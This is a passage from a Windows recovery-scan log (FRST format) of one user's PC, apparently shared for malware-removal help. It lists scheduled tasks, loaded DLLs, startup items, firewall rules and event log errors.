{F097C3CA-BC1A-4D8A-8D24-FBE34B061625} - System32\Tasks\update-sys => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [2014-11-28] () Task: {F3A21A1D-F877-441E-81C3-E40095CD3422} - System32\Tasks\Sony Corporation\VAIO Care\VCSelfHeal => C:\Program Files\Sony\VAIO Care\VCSystemTray.exe [2014-12-03] (Sony Corporation) Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe Task: C:\WINDOWS\Tasks\update-S-1-5-21-2798130160-1945478871-1923780282-1001.job => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe Task: C:\WINDOWS\Tasks\update-sys.job => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe ==================== Loaded Modules (Whitelisted) ============== 2015-04-03 12:38 - 2014-08-27 16:31 - 00265080 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\txmlutil.dll 2015-04-03 12:38 - 2013-09-03 14:29 - 00101328 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\bdmetrics.dll 2015-04-03 12:38 - 2015-02-12 22:53 - 00003072 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\UI\accessl.ui 2015-04-03 12:38 - 2012-10-29 14:22 - 00152816 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\bdfwcore.dll 2015-05-06 19:55 - 2015-05-06 19:55 - 00790368 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\otengines_00350_004\ashttpbr.mdl 2015-05-06 19:55 - 2015-05-06 19:55 - 00711064 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\otengines_00350_004\ashttpdsp.mdl 2015-05-06 19:55 - 2015-05-06 19:55 - 02683520 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\otengines_00350_004\ashttpph.mdl 2015-05-06 19:55 - 2015-05-06 19:55 - 01326504 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\otengines_00350_004\ashttprbl.mdl 2015-03-27 21:49 - 2015-03-30 09:02 - 00020240 _____ () C:\WINDOWS\system32\spool\PRTPROCS\x64\TeamViewer_PrintProcessor.dll 2015-02-13 05:20 - 2015-02-13 05:20 - 00085832 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll 2015-02-13 05:20 - 2015-02-13 05:20 - 01346344 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll 2015-03-27 21:39 - 2014-05-20 09:19 - 00105640 _____ () C:\Program Files\Microsoft Office 15\ClientX64\ApiClient.dll 2015-03-27 18:58 - 2015-05-12 05:30 - 00116368 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll 2013-11-28 23:35 - 2013-11-28 23:35 - 00011264 _____ () C:\Program Files (x86)\Bluetooth Suite\Modules\ActivateDesktopDebugger\ActivateDesktopDebugger.dll 2013-11-28 23:32 - 2013-11-28 23:32 - 00086016 _____ () C:\Program Files (x86)\Bluetooth Suite\Modules\Map\MAP.dll 2013-11-28 23:38 - 2013-11-28 23:38 - 00012928 _____ () C:\Program Files (x86)\Bluetooth Suite\ActivateDesktop.exe 2013-11-28 23:38 - 2013-11-28 23:38 - 00384128 _____ () C:\Program Files (x86)\Bluetooth Suite\ContactsApi.dll 2013-11-28 23:28 - 2013-11-28 23:28 - 00020992 _____ () C:\Program Files (x86)\Bluetooth Suite\L10n\de-DE\BtTray.de-DE.dll 2015-05-22 16:44 - 2015-05-22 16:44 - 00043480 _____ () C:\Program Files\FileZilla FTP Client\fzshellext_64.dll 2015-05-22 20:22 - 2015-04-15 21:41 - 01616384 _____ () C:\Program Files (x86)\MediaMonkey\MediaMonkey64Helper.exe 2015-03-13 15:54 - 2015-03-13 15:54 - 00057344 _____ () C:\Program Files\CCleaner\lang\lang-1031.dll 2015-03-27 22:51 - 2015-03-27 22:51 - 00039192 _____ () C:\Program Files\CCleaner\branding.dll 2014-01-01 18:13 - 2014-01-01 18:13 - 00245760 _____ () C:\Users\Ruben\Eigene Programme\uGet\bin\uget.exe 2015-05-09 11:31 - 2015-05-09 11:31 - 00052224 _____ () C:\Users\Ruben\.gradle\native\19\windows-amd64\native-platform.dll 2015-05-12 15:18 - 2015-05-12 15:18 - 00042496 _____ () C:\Program Files\IntelliJ\bin\IdeaWin64.dll 2015-05-12 15:18 - 2015-05-12 15:18 - 00050688 _____ () C:\Program Files\IntelliJ\bin\focuskiller64.dll 2015-05-12 15:18 - 2015-05-12 15:18 - 00061952 _____ () C:\Program Files\IntelliJ\bin\jumplistbridge64.dll 2015-05-12 15:17 - 2015-05-12 15:17 - 00216064 _____ () C:\Program Files\IntelliJ\lib\libpty\win\x86_64\libwinpty.dll 2015-05-12 15:17 - 2015-05-12 15:17 - 00201728 _____ () C:\Program Files\IntelliJ\lib\libpty\win\x86_64\winpty-agent.exe 2015-05-04 19:29 - 2014-11-25 19:09 - 00741888 _____ () C:\Program Files\HexChat\hexchat.exe 2015-05-04 19:29 - 2014-11-22 19:50 - 01394688 _____ () C:\Program Files\HexChat\cairo.dll 2015-05-04 19:29 - 2014-11-22 19:48 - 00076288 _____ () C:\Program Files\HexChat\zlib1.dll 2015-05-04 19:29 - 2014-11-22 19:48 - 00225280 _____ () C:\Program Files\HexChat\libpng16.dll 2015-05-04 19:29 - 2014-11-22 19:48 - 00682496 _____ () C:\Program Files\HexChat\fontconfig.dll 2015-05-04 19:29 - 2014-11-22 19:48 - 00028160 _____ () C:\Program Files\HexChat\iconv.dll 2015-05-04 19:29 - 2014-11-22 19:49 - 00613888 _____ () C:\Program Files\HexChat\pixman-1.dll 2015-05-04 19:29 - 2014-11-22 19:48 - 01502720 _____ () C:\Program Files\HexChat\libxml2.dll 2015-05-04 19:29 - 2014-11-22 19:50 - 00783360 _____ () C:\Program Files\HexChat\harfbuzz.dll 2015-05-04 19:29 - 2014-11-22 19:51 - 00056832 _____ () C:\Program Files\HexChat\lib\gtk-2.0\i686-pc-vs10\engines\libwimp.dll 2015-05-04 19:29 - 2014-11-22 19:50 - 00287744 _____ () C:\Program Files\HexChat\lib\enchant\libenchant_myspell.dll 2015-05-04 19:29 - 2014-11-25 19:09 - 00011264 _____ () C:\Program Files\HexChat\plugins\hcupd.dll 2012-10-08 12:41 - 2012-07-31 04:11 - 01198912 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\ACE.dll 2015-05-23 15:54 - 2015-05-20 19:03 - 00622880 _____ () C:\Program Files (x86)\IObit\LiveUpdate\ProductStatistics.dll 2015-05-23 15:53 - 2015-05-20 19:03 - 00348960 _____ () C:\Program Files (x86)\IObit\Start Menu 8\madExcept_.bpl 2015-05-23 15:53 - 2015-05-20 19:03 - 00183584 _____ () C:\Program Files (x86)\IObit\Start Menu 8\madBasic_.bpl 2015-05-23 15:53 - 2015-05-20 19:03 - 00050976 _____ () C:\Program Files (x86)\IObit\Start Menu 8\madDisAsm_.bpl 2015-05-23 15:54 - 2015-05-20 19:04 - 00268920 _____ () C:\Program Files (x86)\IObit\Start Menu 8\sqlite3.dll 2015-05-23 15:54 - 2015-05-20 19:03 - 00053024 _____ () C:\Program Files (x86)\IObit\Start Menu 8\parseAuto.dll 2015-05-23 15:54 - 2015-05-20 19:03 - 00622880 _____ () C:\Program Files (x86)\IObit\Start Menu 8\ProductStatistics.dll 2015-03-30 19:56 - 2015-05-08 02:36 - 00011920 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll 2015-05-23 15:54 - 2015-05-20 19:04 - 00041248 _____ () C:\Program Files (x86)\IObit\Start Menu 8\winkey.dll 2015-05-22 20:22 - 2015-04-24 01:56 - 00581632 _____ () C:\Program Files (x86)\MediaMonkey\sqlite3MM.dll 2015-05-22 20:22 - 2015-04-24 02:02 - 00054784 _____ () C:\Program Files (x86)\MediaMonkey\MMHelper.dll 2015-05-22 20:22 - 2015-04-24 02:02 - 00390656 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\f_aac.dll 2015-05-22 20:22 - 2015-04-24 02:02 - 00327680 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\f_ape.dll 2015-05-22 20:22 - 2015-04-24 02:02 - 00306688 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\f_AVI.dll 2015-05-22 20:22 - 2015-04-24 02:02 - 00132608 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\f_flac.dll 2015-05-22 20:22 - 2015-04-24 02:02 - 00267264 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\f_flac_codec.dll 2015-05-22 20:22 - 2015-04-24 02:02 - 00262656 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\f_FLV.dll 2015-05-22 20:22 - 2015-04-24 02:02 - 00376832 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\f_mkv.dll 2015-05-22 20:22 - 2015-04-24 02:02 - 00395264 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\f_MP4.dll 2015-05-22 20:22 - 2015-04-24 02:02 - 00328192 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\f_mpc.dll 2015-05-22 20:22 - 2015-04-24 02:02 - 00269824 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\f_MPG.dll 2015-05-22 20:22 - 2015-04-24 02:02 - 00352768 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\f_ogg.dll 2015-05-22 20:22 - 2015-04-24 02:02 - 00141824 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\f_video.dll 2015-05-22 20:22 - 2015-04-24 02:02 - 00335360 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\f_wave.dll 2015-05-22 20:22 - 2015-04-24 01:56 - 00374272 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\f_WMV.dll 2015-05-22 20:22 - 2015-04-24 02:02 - 00061440 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\in_mfaudio.dll 2015-05-22 20:22 - 2010-06-17 16:13 - 00077824 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\in_mpc.dll 2015-05-22 20:22 - 2015-04-24 02:02 - 00321024 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\in_vorbis.dll 2015-05-22 20:22 - 2015-04-24 02:02 - 00081408 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\in_wav.dll 2015-05-22 20:22 - 2015-04-24 02:02 - 00222720 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\in_wma.dll 2015-05-22 20:22 - 2015-04-24 02:02 - 00103936 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\in_wmp3.dll 2015-05-22 20:22 - 2015-04-24 02:02 - 00348672 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\out_MMDS.dll 2015-05-22 20:22 - 2015-04-24 02:02 - 00873984 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\out_WASAPI.dll 2015-05-22 20:22 - 2012-11-09 21:18 - 00013824 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\out_wave.dll 2015-05-22 20:22 - 2015-04-24 02:02 - 00103936 _____ () C:\Program Files (x86)\MediaMonkey\Equalize.dll 2015-05-22 20:22 - 2015-04-24 02:02 - 01055232 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\d_iPhone.dll 2015-05-22 20:22 - 2015-04-24 01:56 - 01176064 _____ () C:\Program Files (x86)\MediaMonkey\iPhoneCalc.dll 2015-05-22 20:22 - 2015-04-24 02:02 - 00900608 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\d_iPod.dll 2015-05-22 20:22 - 2015-04-24 02:02 - 00400384 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\d_iRiverH.dll 2015-05-22 20:22 - 2015-04-24 02:02 - 00422912 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\d_WMDM.dll 2015-05-22 20:22 - 2015-04-24 02:02 - 00132608 _____ () C:\Program Files (x86)\MediaMonkey\WMAuth.dll 2012-03-19 06:07 - 2012-03-19 06:07 - 00647675 _____ () C:\Users\Ruben\Eigene Programme\uGet\bin\libcairo-2.dll 2010-03-31 04:29 - 2010-03-31 04:29 - 00279955 _____ () C:\Users\Ruben\Eigene Programme\uGet\bin\libidn-11.dll 2013-06-23 01:23 - 2013-06-23 01:23 - 00113166 _____ () C:\Users\Ruben\Eigene Programme\uGet\bin\zlib1.dll 2012-03-18 23:00 - 2012-03-18 23:00 - 00576478 _____ () C:\Users\Ruben\Eigene Programme\uGet\bin\libpixman-1-0.dll 2012-10-07 21:40 - 2012-10-07 21:40 - 00177161 _____ () C:\Users\Ruben\Eigene Programme\uGet\bin\libpng15-15.dll 2012-03-19 06:07 - 2012-03-19 06:07 - 00052730 _____ () C:\Users\Ruben\Eigene Programme\uGet\bin\libcairo-gobject-2.dll 2012-05-12 20:49 - 2012-05-12 20:49 - 00051537 _____ () C:\Users\Ruben\Eigene Programme\uGet\bin\libffi-6.dll 2012-03-18 23:00 - 2012-03-18 23:00 - 00052188 _____ () C:\Users\Ruben\Eigene Programme\uGet\bin\ICONV.DLL 2012-03-19 02:01 - 2012-03-19 02:01 - 00226231 _____ () C:\Users\Ruben\Eigene Programme\uGet\bin\libfontconfig-1.dll 2012-03-19 00:43 - 2012-03-19 00:43 - 00549926 _____ () C:\Users\Ruben\Eigene Programme\uGet\bin\libfreetype-6.dll 2012-07-21 23:46 - 2012-07-21 23:46 - 00176311 _____ () C:\Users\Ruben\Eigene Programme\uGet\bin\libexpat-1.dll 2012-03-31 05:31 - 2012-03-31 05:31 - 00050032 _____ () C:\Users\Ruben\Eigene Programme\uGet\lib\pango\1.6.0\modules\pango-basic-win32.dll 2013-11-19 11:21 - 2013-11-19 11:21 - 00347136 _____ () C:\Program Files\Sony\VAIO Care\Iolo\vosges.dll 2015-03-27 21:52 - 2015-03-27 21:52 - 01020928 _____ () C:\Users\Ruben\AppData\Roaming\Mozilla\Firefox\Profiles\i1zvapai.default\extensions\support@lastpass.com\platform\WINNT_x86-msvc\components\lpxpcom.dll 2015-03-27 21:39 - 2015-03-27 21:39 - 00316576 _____ () C:\Program Files\Microsoft Office 15\root\office15\AppVIsvStream32.dll 2015-04-03 12:38 - 2014-08-27 16:30 - 00204280 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\antispam32\txmlutil.dll 2015-04-03 12:38 - 2013-09-03 14:29 - 00095088 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\antispam32\bdmetrics.dll 2015-05-02 11:28 - 2015-05-02 11:28 - 01754296 _____ () C:\Program Files\Microsoft Office 15\Root\Office15\tmpod.dll 2015-05-19 19:29 - 2015-04-14 14:42 - 01032360 _____ () C:\Program Files\Microsoft Office 15\Root\Office15\ADDINS\UmOutlookAddin.dll ==================== Safe Mode (Whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\str => ""="service" ==================== EXE Association (Whitelisted) =============== (If an entry is included in the fixlist, the registry item will be restored to default or removed.) ==================== Internet Explorer trusted/restricted =============== (If an entry is included in the fixlist, it will be removed from the registry.) ==================== Other Areas ============================ (Currently there is no automatic fix for this section.) HKU\S-1-5-21-2798130160-1945478871-1923780282-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Ruben\Pictures\Wallpaper2.jpg DNS Servers: 192.168.2.1 ==================== MSCONFIG/TASK MANAGER disabled items == (Currently there is no automatic fix for this section.) HKLM\...\StartupApproved\Run: => "iTunesHelper" HKLM\...\StartupApproved\Run: => "Bdagent" HKLM\...\StartupApproved\Run32: => "APSDaemon" HKLM\...\StartupApproved\Run32: => "QuickTime Task" HKLM\...\StartupApproved\Run32: => "Andy" HKLM\...\StartupApproved\Run32: => "Wondershare Helper Compact.exe" HKU\S-1-5-21-2798130160-1945478871-1923780282-1001\...\StartupApproved\StartupFolder: => "Curse.lnk" HKU\S-1-5-21-2798130160-1945478871-1923780282-1001\...\StartupApproved\Run: => "Bitdefender-Geldbörse-Agent" ==================== FirewallRules (Whitelisted) =============== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139 FirewallRules: [{DD925A9E-B4C1-4B8E-849F-F5B2D1E3750C}] => (Allow) C:\Program Files\Sony\VAIO Care\VAIOShell.exe FirewallRules: [{CEAEEEB0-3B7A-4FD2-BD86-5F9D4E5B7181}] => (Allow) C:\Program Files\Sony\VAIO Care\VCSystemTray.exe FirewallRules: [{8C88C867-50B5-49FA-B27A-A6501E573C53}] => (Allow) C:\Program Files\Sony\VAIO Care\VCAdmin.exe FirewallRules: [{81A94CB6-BD07-4B41-86F1-56F62D54A30C}] => (Allow) C:\Program Files\Sony\VAIO Care\VCAgent.exe FirewallRules: [{F0BD25BE-3DA4-45B0-BDC7-A9509356E3FA}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{1948BECA-120F-4B78-BFDC-8E058F0DEFA9}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{1DE862D0-EFB3-43CF-BCA0-DD391A80129B}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe FirewallRules: [{D6477072-192A-4655-8CFE-3A8B772F2BCC}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\outlook.exe FirewallRules: [{91F6ED8B-B20A-4F6D-8911-A62AA0F81795}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\Lync.exe FirewallRules: [{25D666CF-F9A5-4DB3-9C5A-C6C2205B148B}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\UcMapi.exe FirewallRules: [{461BC6C2-A82E-4B0F-BAF9-8D3DC7865ED1}] => (Allow) C:\Users\Ruben\AppData\Roaming\Dropbox\bin\Dropbox.exe FirewallRules: [{A719AE01-014A-48EF-B352-C6B3745318EA}] => (Allow) C:\Users\Ruben\AppData\Roaming\Dropbox\bin\Dropbox.exe FirewallRules: [{882E18AB-1C26-4C7E-9ED6-3AEADE82DB1F}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe FirewallRules: [{5A618EA3-6C07-4A3B-991A-5573F557885D}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe FirewallRules: [{66882F61-384B-439A-A65E-C22FD1685276}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe FirewallRules: [{073CE425-0219-4249-849D-A37470DD5C03}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe FirewallRules: [{7FB503F9-4CAA-4A6E-A481-44D4FCFC18CF}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [{A927EFF4-FC35-44BA-A26E-97542BBDF127}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [{C656BED8-B935-4238-A470-3CE7DC989E1B}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe FirewallRules: [{2F2BBB2B-9020-44C3-BF2E-BEEE4BDD0CB0}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe FirewallRules: [{A33DFD9A-D7C1-499F-99DD-4EDA3A14A28C}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{449C037F-3ADF-44F5-AC08-6204EF4F9C1E}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{32BB99B2-9080-4673-9094-08EFD0027CBB}] => (Allow) C:\Program Files\iTunes\iTunes.exe FirewallRules: [TCP Query User{64D20F49-A8E7-43F0-A7BA-6E2E7F3C4A8E}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe FirewallRules: [UDP Query User{F9417769-B14A-4FA9-858C-F3FC27AD174B}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe FirewallRules: [{BE539453-E7B6-4C8A-96B2-D9CEF1939CC4}] => (Allow) C:\Users\Ruben\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{1AFE48EC-9617-427D-A894-712AA60852D1}] => (Allow) C:\Users\Ruben\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [TCP Query User{4D648023-286B-455E-8802-3EF66754A5C8}C:\users\ruben\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\ruben\appdata\roaming\dropbox\bin\dropbox.exe FirewallRules: [UDP Query User{53D3AD5D-3EF1-4BFE-913A-E6513F3EBE35}C:\users\ruben\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\ruben\appdata\roaming\dropbox\bin\dropbox.exe FirewallRules: [TCP Query User{5F0DDEB8-1185-42B5-BE14-DB7B6C36F430}C:\users\ruben\eigene programme\eclipse\eclipse.exe] => (Allow) C:\users\ruben\eigene programme\eclipse\eclipse.exe FirewallRules: [UDP Query User{A6CAAD5D-EC45-40D3-A2EA-DF5A78B948F0}C:\users\ruben\eigene programme\eclipse\eclipse.exe] => (Allow) C:\users\ruben\eigene programme\eclipse\eclipse.exe FirewallRules: [TCP Query User{00387E7A-07D1-452B-ABF3-A52B1BD91493}C:\users\ruben\eigene programme\cursemc\minecraft\install\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\ruben\eigene programme\cursemc\minecraft\install\runtime\jre-x64\1.8.0_25\bin\javaw.exe FirewallRules: [UDP Query User{65CB58F6-9D10-409F-9809-1882C7350A0F}C:\users\ruben\eigene programme\cursemc\minecraft\install\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\ruben\eigene programme\cursemc\minecraft\install\runtime\jre-x64\1.8.0_25\bin\javaw.exe FirewallRules: [{001AF3C6-80DB-46A6-8439-38596A680337}] => (Block) C:\users\ruben\eigene programme\cursemc\minecraft\install\runtime\jre-x64\1.8.0_25\bin\javaw.exe FirewallRules: [{345109F8-8A06-4336-9505-79E484E02DCF}] => (Block) C:\users\ruben\eigene programme\cursemc\minecraft\install\runtime\jre-x64\1.8.0_25\bin\javaw.exe FirewallRules: [{0CBE8861-599D-4DA0-9185-FC4397925669}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe FirewallRules: [{01607C1B-7BB7-4575-99B3-66A696D4356F}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe FirewallRules: [{2DDE0A59-314B-46D0-B276-FB4EF9BB65F3}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe FirewallRules: [{3F02CA08-7D82-4B60-AF8E-2B1ED2D4AB52}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe FirewallRules: [{3EBF5AF8-DCB8-4875-8E7F-8FE480E061EB}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\Lync.exe FirewallRules: [{0A800CDA-F59C-4D51-912E-A144C5416E79}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\UcMapi.exe FirewallRules: [{C6DFD0C4-FED3-4DB5-816B-E0BDBFDB3C54}] => (Allow) C:\Users\Ruben\AppData\Local\Microsoft\OneDrive\OneDrive.exe FirewallRules: [TCP Query User{04FB0F18-9435-4AF2-BEF8-5CDC3F531123}C:\program files\intellij\bin\idea64.exe] => (Allow) C:\program files\intellij\bin\idea64.exe FirewallRules: [UDP Query User{313B7718-9F27-4709-848B-8F9241C27477}C:\program files\intellij\bin\idea64.exe] => (Allow) C:\program files\intellij\bin\idea64.exe FirewallRules: [TCP Query User{CF98FF0B-930A-44F5-8E10-44232E22396C}C:\xampp\filezillaftp\filezillaserver.exe] => (Allow) C:\xampp\filezillaftp\filezillaserver.exe FirewallRules: [UDP Query User{11E89715-1686-47B7-9236-870765CCB77B}C:\xampp\filezillaftp\filezillaserver.exe] => (Allow) C:\xampp\filezillaftp\filezillaserver.exe FirewallRules: [TCP Query User{7E2CE727-F46F-4C38-BF8A-7B8BB7DCAB9E}C:\program files\hexchat\hexchat.exe] => (Allow) C:\program files\hexchat\hexchat.exe FirewallRules: [UDP Query User{393154D5-4F67-4AA3-9B6E-CE2C1B3FB2A8}C:\program files\hexchat\hexchat.exe] => (Allow) C:\program files\hexchat\hexchat.exe FirewallRules: [TCP Query User{DFCB56DB-ADB1-4A5A-8275-43DF16AC4AD2}C:\program files\intellij\bin\idea.exe] => (Allow) C:\program files\intellij\bin\idea.exe FirewallRules: [UDP Query User{9AC65511-E2B4-42B6-8BC5-C195BC5D2320}C:\program files\intellij\bin\idea.exe] => (Allow) C:\program files\intellij\bin\idea.exe FirewallRules: [TCP Query User{AD192AF7-7090-4802-9D2F-19FEA3D04563}C:\program files\intellij\jre\jre\bin\java.exe] => (Allow) C:\program files\intellij\jre\jre\bin\java.exe FirewallRules: [UDP Query User{FA5B7958-9A79-4EA1-8B95-47AEC9B7BB67}C:\program files\intellij\jre\jre\bin\java.exe] => (Allow) C:\program files\intellij\jre\jre\bin\java.exe FirewallRules: [TCP Query User{78DC35BA-63BE-45A4-9B28-436D7106EEBF}C:\users\ruben\eigene programme\ts3-server\ts3server_win64.exe] => (Allow) C:\users\ruben\eigene programme\ts3-server\ts3server_win64.exe FirewallRules: [UDP Query User{493F144E-1701-4D71-B6A1-671F268224EA}C:\users\ruben\eigene programme\ts3-server\ts3server_win64.exe] => (Allow) C:\users\ruben\eigene programme\ts3-server\ts3server_win64.exe FirewallRules: [TCP Query User{3CD04B14-348E-4AAF-8440-84D39EF96E80}C:\program files\java\jdk1.8.0_45\jre\bin\java.exe] => (Allow) C:\program files\java\jdk1.8.0_45\jre\bin\java.exe FirewallRules: [UDP Query User{8F1DA501-91DF-4E9B-9C13-0DF33CE5F045}C:\program files\java\jdk1.8.0_45\jre\bin\java.exe] => (Allow) C:\program files\java\jdk1.8.0_45\jre\bin\java.exe FirewallRules: [TCP Query User{E4D2DEF3-A8E9-4B0B-AC04-856DC6DF5CBB}C:\program files\java\jdk1.8.0_45\bin\java.exe] => (Allow) C:\program files\java\jdk1.8.0_45\bin\java.exe FirewallRules: [UDP Query User{34DB8E10-71D6-4EBA-9628-44DA321B42CB}C:\program files\java\jdk1.8.0_45\bin\java.exe] => (Allow) C:\program files\java\jdk1.8.0_45\bin\java.exe FirewallRules: [TCP Query User{6328F78B-3A57-48B4-9146-35217F903A7B}C:\program files (x86)\mediamonkey\mediamonkey (non-skinned).exe] => (Allow) C:\program files (x86)\mediamonkey\mediamonkey (non-skinned).exe FirewallRules: [UDP Query User{273EABDD-F8CE-48F9-8C9C-D9557C806EB3}C:\program files (x86)\mediamonkey\mediamonkey (non-skinned).exe] => (Allow) C:\program files (x86)\mediamonkey\mediamonkey (non-skinned).exe FirewallRules: [TCP Query User{A404130A-0425-4132-848C-899EC2569128}C:\program files (x86)\jitsi\jitsi.exe] => (Allow) C:\program files (x86)\jitsi\jitsi.exe FirewallRules: [UDP Query User{3BDC952C-FE10-4DD7-A82D-83A96D69BA28}C:\program files (x86)\jitsi\jitsi.exe] => (Allow) C:\program files (x86)\jitsi\jitsi.exe FirewallRules: [TCP Query User{4A3810D0-C1ED-4BFE-824B-3FED2CBBFF87}C:\program files (x86)\counterpath\x-lite\x-lite.exe] => (Allow) C:\program files (x86)\counterpath\x-lite\x-lite.exe FirewallRules: [UDP Query User{88923A50-6B3E-4CE2-9D9A-3AA81015E839}C:\program files (x86)\counterpath\x-lite\x-lite.exe] => (Allow) C:\program files (x86)\counterpath\x-lite\x-lite.exe FirewallRules: [{5A7E5589-C90F-45DC-A878-963032A93E22}] => (Block) %ProgramFiles% (x86)\DisplayFusion\DisplayFusion.exe FirewallRules: [{14F8B720-E677-41E6-916F-B8204F48679E}] => (Block) %ProgramFiles% (x86)\DisplayFusion\DisplayFusionCommand.exe FirewallRules: [{3E3167E1-AEF9-4A76-ADF0-736B4EDC6A30}] => (Block) %ProgramFiles% (x86)\DisplayFusion\DisplayFusionHelperWin8.exe FirewallRules: [{DE6AC810-9699-4CF0-857A-82CEF3E5D2ED}] => (Block) %ProgramFiles% (x86)\DisplayFusion\DisplayFusionService.exe FirewallRules: [{F7794D9B-2754-4396-B659-7F60A34C50CC}] => (Block) %ProgramFiles% (x86)\DisplayFusion\DisplayFusionSettings.exe FirewallRules: [TCP Query User{D0FBC95D-7272-4FB2-81EF-D12404986665}C:\program files (x86)\mediamonkey\mediamonkey.exe] => (Allow) C:\program files (x86)\mediamonkey\mediamonkey.exe FirewallRules: [UDP Query User{D2920D89-E343-4747-89D5-994450412161}C:\program files (x86)\mediamonkey\mediamonkey.exe] => (Allow) C:\program files (x86)\mediamonkey\mediamonkey.exe FirewallRules: [TCP Query User{ED855DBA-BA50-4583-97F1-C642301F43D8}C:\program files (x86)\jetbrains\phpstorm 8.0.3\bin\phpstorm.exe] => (Allow) C:\program files (x86)\jetbrains\phpstorm 8.0.3\bin\phpstorm.exe FirewallRules: [UDP Query User{535BE06A-670C-41CB-BB85-FA3DAD9D358C}C:\program files (x86)\jetbrains\phpstorm 8.0.3\bin\phpstorm.exe] => (Allow) C:\program files (x86)\jetbrains\phpstorm 8.0.3\bin\phpstorm.exe ==================== Faulty Device Manager Devices ============= ==================== Event log errors: ========================= Application errors: ================== Error: (05/27/2015 08:15:21 AM) (Source: Windows Search Service) (EventID: 1019) (User: ) Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-2798130160-1945478871-1923780282-1001}/">. Error: (05/27/2015 08:11:53 AM) (Source: Application Hang) (EventID: 1002) (User: ) Description: Programm Explorer.EXE, Version 6.3.9600.17667 kann nicht mehr unter Windows ausgeführt werden und wurde beendet. 